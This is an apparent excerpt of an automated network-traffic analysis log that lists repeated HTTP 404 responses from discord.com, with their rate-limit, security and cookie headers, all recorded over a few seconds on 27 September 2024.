__cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:49 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e1d43587cec11efaceb3afbab16203a; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453931x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1jcsZ632z4wAIayU2OyvV%2BxWivQLiijJaTylQFpILiWNmiohksX1E%2FSbLTnddCUoGmWYRI9Q%2FJCzEAlAhm2BPPucdNJ4fObq0OMSaVdmH%2BJBUtkDuGM5dQJghEC5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e1d43587cec11efaceb3afbab16203a57f8b4487d16c7ea1e5af554e299d0a89a98c2725a43224f2fef5231ab51d425; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:50 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e25bae27cec11efba92de6f7e04d91f; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453931x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFPou7Ly7EDyqnIeOmgLepZnN4qr4%2FDnPO4qKzS7fJE3FX8ptyTUiLopbsveCR1hjF3sctXpnzMhxRiXzJj324dOVk3J%2Fq%2BvE0y14AkezjGAdEjlI9ucHxkDN86d"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e25bae27cec11efba92de6f7e04d91f7cc0110f1e71e2488bdd99cb271f4663c7c2ab2858b5b61a107ad4fd00dcf7ad; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:50 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e8e70147cec11efa1e1a6a6d338c935; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453932x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ui0h6LY2TA975PP8hrbL6Rn9ed5x4e4A%2F4iYiZNAZxOhND%2BBUzXoNM%2BqomWdmTF%2F0OzbxZnSaOsqZb%2FqL%2BlEfWU7OXyAYITzA7f7WHeod8vdS13GHA5tw4wVfA0L"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e8e70147cec11efa1e1a6a6d338c935d787564224f81a52ba35e29a80bd3a864c9f3775dde1657035d4b8bbe7a36439; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:50 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e9d8b4e7cec11ef852fbe573e76249d; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453932x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0wrL88lead%2Fx6hy8klXu4pPvtZEpI%2F0pDKopLHw7GL6t456npHX5FKS22j%2Fn1G7kDjndp3k%2Fn8tw9CSDRAW5YKwd6MTMDvLkYb5mIMuFWbfrOOH%2FtntcWm5HgTF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e9d8b4e7cec11ef852fbe573e76249d67437e93f77931898004f1f78a6698ac2ddbba2c8d61e800e8f47dcd5912d425; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2ef510087cec11ef9c0d124b36f1d382; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453933x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oa0d3H%2B2YNBcftR3sjRCw%2FQB3NzMr0%2BeVBIlEkEODQGnMrwzoBzx7WtEGb26CEgkh0bCcwHPDczW5MHbCmM9HhP2eIBRk7Oj1zW3w%2B3Dg2yAN1KyrFnKIs5Qw9gW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2ef510087cec11ef9c0d124b36f1d3829bb0bb8cb584b865e3ac91dbc57d16d57a1b6b8c5f5ac0ee510533934fed87c6; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=b9abd809e0334626dff7c87e6434dc816a7033f1-1727453931; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2f047d047cec11ef85ed067ba21bebfe; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453933x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bxf253Q498%2FMMLryXIURf%2B7xKpYrAu88NpKMZTHnsiTA8b7tZYPo66pv%2B0cD8zA9TkbicREVvlXnoTvFNjya6MFVdkcjtFjlk%2Fruiz%2BKMvxtZYSzH59Nca222zzx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2f047d047cec11ef85ed067ba21bebfe0e5f5f20399985eeec12c0af5433f1f82f9e8a371b829c6091a4ab9a85478bd6; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=b9abd809e0334626dff7c87e6434dc816a7033f1-1727453931; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:52 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2f6b5cf47cec11efb5ce16ad33b060f2; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453933x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3v%2Fgm%2FLVLFrHt9jdiQQvhGAvpqWdgmBYIsdriniRJOg3qteo5M0aZ9PdLhHvvSzcu4u2HyMGVdIZcef0oBWKdPanu7Ggc9tDbJeCFPHk3QtckzkduAWwJezubJ0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2f6b5cf47cec11efb5ce16ad33b060f2963a185fec13ac46aeceda20083a51363540c29048eb5cd51caff213e9f6819f; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6a9f61f54c68ada5aae4c2e5f45fd9d07ebfdfbb-1727453932; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:52 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2fd62f207cec11ef9478bec7e893c0ff; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453934x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bu7Yqqwp7%2Bs2PSW5ZKNTIvzzPQP%2BbyqMy4bhi5pb2BOcSVoEp6DesiB6lZ6NZNEQxvrh8Hvg2zSlCzYV4ZF%2F07nQOi7tVyB4axRe8c%2F0vkP5YF26vHfk4o2hksl4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2fd62f207cec11ef9478bec7e893c0ff677f20117665331703391b771d5fb5f5649ddefc0a99d4b96ef86586658d0d02; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6a9f61f54c68ada5aae4c2e5f45fd9d07ebfdfbb-1727453932; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:53 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=303ad38a7cec11ef894692cc3f667719; Expires=Wed, 26-Sep-2029 16:18:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453934x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QShPN%2FNf9IrmsETLd0ehwwIZZwBvBfju7kwZ89KsrZNl1IcCMbbO9m2EJ%2BZ5GdeB2D3Rs1LNXKoqZLvuWge4U7UntwlhP3pg44V561WKk830wsLkLJyQHOetI8EH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=303ad38a7cec11ef894692cc3f667719703d78845b9d2992d263c75fbc29682aa9f61d3feb155da2059d4a5c293e7801; Expires=Wed, 26-Sep-2029 16:18:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=8d94676341efb39bad306ebb92a7fe1d375736b4-1727453933; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:54 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=30a3d9207cec11ef96902e88ff694586; Expires=Wed, 26-Sep-2029 16:18:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453935x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z3uW8mhJQe3h6mjBPduwb7BN%2Bz7PDOoy0%2FruhAfZcAjpA8YDgxhTfgHXlMFvLkQm4gngaZlaprYk0m9N7F3ERT0c7KVLFJSjSGQ0WdUxpNdnXGOW7xjj2TjWbJ%2F%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=30a3d9207cec11ef96902e88ff694586d92bddde534c181d0b626fe8b7577f54e6bd291a31ce00edc8bf56a23921a6ef; Expires=Wed, 26-Sep-2029 16:18:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=7ad43c1cb07092dd708b3c6e0f1bdcacbed004e5-1727453934; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:57 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=329b7f587cec11ef8759067ba21bebfe; Expires=Wed, 26-Sep-2029 16:18:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453938x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=weV7j%2B%2Fcm0bfSD3Kn5sHq07M%2B6lbS%2FhKRcUWz6GP83C28ALA2TC5IRp1Lnk%2FvXKu7XEUfSZdbjm%2F9wbpO9eAUdfRwHnrRcLpwbE2MFiD9lvZPxM5vDfOXpI8UQi%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=329b7f587cec11ef8759067ba21bebfed62991a5c924e1de9d3ff54e7f992b67e3ad9dec8eea5d81c7fdcb92c1cf2105; Expires=Wed, 26-Sep-2029 16:18:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=8e1ec1b277cf704c68f172d827a97e5d2a5c3a4f-1727453937; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:58 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=330b72687cec11ef9d31a6b2eb948c40; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453939x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aqWDRFTvp7syoDR0H0EdkpPkq3D6OAiDbXYchTpVg1lH%2FyKK23Jg8JVi4zzOfjiOU2VkxUu%2FiviTs%2BWpF77UbgrKT78LhNpFboinuacLDIMb7OSPGJ8LlTrFbJmH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=330b72687cec11ef9d31a6b2eb948c403f464fd8fe449b60da10b36b6a4d7712c0782e29ea00433a3fce18170ff87869; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=91e624c7b228afc6fcf83acd401688349adc8fc6-1727453938; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:58 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3373e0aa7cec11efb69c0e478e5d82a7; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453940x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E6JgMhDovB4s%2Fqu%2BJZullT8n%2BwHKbJcn3kZhxpXnvc3fa1TJ9y%2FeZ4cxlc1s8jSaPbpV0qIbnFfs1G8nI%2B9tbaWi%2B8NdUhlK05jQUIogMItQdqxJgplU3GKx1Lzj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3373e0aa7cec11efb69c0e478e5d82a7b55a41caa7f284bfb007246733a54c791206f9615674ad856e7525e21bb19b34; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=91e624c7b228afc6fcf83acd401688349adc8fc6-1727453938; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:59 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=33dc716a7cec11ef890f96ff52647fd0; Expires=Wed, 26-Sep-2029 16:18:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453940x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPeZZdHiAL4LQe81%2B6lNMjplFr7IRKU57LCtkAiCXxOEsMSGoJckKZmAGjtXlSF8nSWG9pmlT7tGv9VcVg3S7e4fO%2B1K04nLUgleimJPiEv8DYqH4XYMgJZXN9SP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=33dc716a7cec11ef890f96ff52647fd0765c1bad81131c38e995494547fec0b7c3e82588608aa36ea38fba7f4e69523c; Expires=Wed, 26-Sep-2029 16:18:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=5021d9c541e5ec266375367b8a579b9688877fb3-1727453939; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:00 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=34574a527cec11efa2060e62cbdde762; Expires=Wed, 26-Sep-2029 16:19:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453941x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GunBpw3H93FVr7nxI3vW7UWUSuJqVO2CDJFBsYOURr30lgS4j2kSaKca8KnZKv8PUtU2PNeMfdfw4iS4KU1fzdd6HV1jMXtvWxRLm2zmvvs6u5Fy47rHLV8EdIP6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=34574a527cec11efa2060e62cbdde76223474cb28fd6dbbf2103019ed06984a82fe56697383b506ece1febe3e8d3e11f; Expires=Wed, 26-Sep-2029 16:19:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=7affd72039bfc759ddd7d629cf7feaa78cb7e6c9-1727453940; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:01 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=34bf85b87cec11efb41b16ad33b060f2; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453942x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDmJdrMNV2xiJYzH2lNiDU3R8dCJjfGmlMoVL9FYDsu5amF4pHIxWZJjTtELnaGaMZWwHEA2FMPI2WIHbyAdLscMxY3U4KWklJCHvn4OZhDk2DreENz3p85d%2BJDA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=34bf85b87cec11efb41b16ad33b060f2b95a6d5062626dde94c14e84002967a5fb0b075e1e482e91ac2d49e42de876ee; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=fbe7f0d857c54826245c4e0cf497aa483d23d881-1727453941; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:01 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3534f97e7cec11ef93886a726fe7a83e; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453943x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cRk6kaTaqqq5uXKTyOTn7IDbhJ5cFsLSEk01TjECb4HNyXfPUhfoY%2BJVdEAKutQc%2BC07B0Z8NTq6WgGfiEtxF3soYpk6UeT36fjAy%2BkoSAgofzpPYxGek87BJAro"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3534f97e7cec11ef93886a726fe7a83e1c137929250cb519ca8b91474352381d171f4301648df8ec637c694a9b75e94a; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=fbe7f0d857c54826245c4e0cf497aa483d23d881-1727453941; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:02 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=35a295427cec11ef91f2bee3f8a49ee5; Expires=Wed, 26-Sep-2029 16:19:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453943x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xRWE2%2FbkJRY5CBVvGAMXY%2FfawRRtG%2B174oxnlApwpmKo6LvcPf95SgqnIYPVEYpGFzc6Z4p6hePoiEefq3q09GrVs4NdN0OEnXqTNxpRfM8orrA0tbuT62MRMYBv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=35a295427cec11ef91f2bee3f8a49ee5d8d0e84959a2381178676574c1aca333daa355925bb8caffbdcc127a490ba9d7; Expires=Wed, 26-Sep-2029 16:19:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=c706bff95cf2f6ea15d8fa6873914924c3ad57a1-1727453942; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
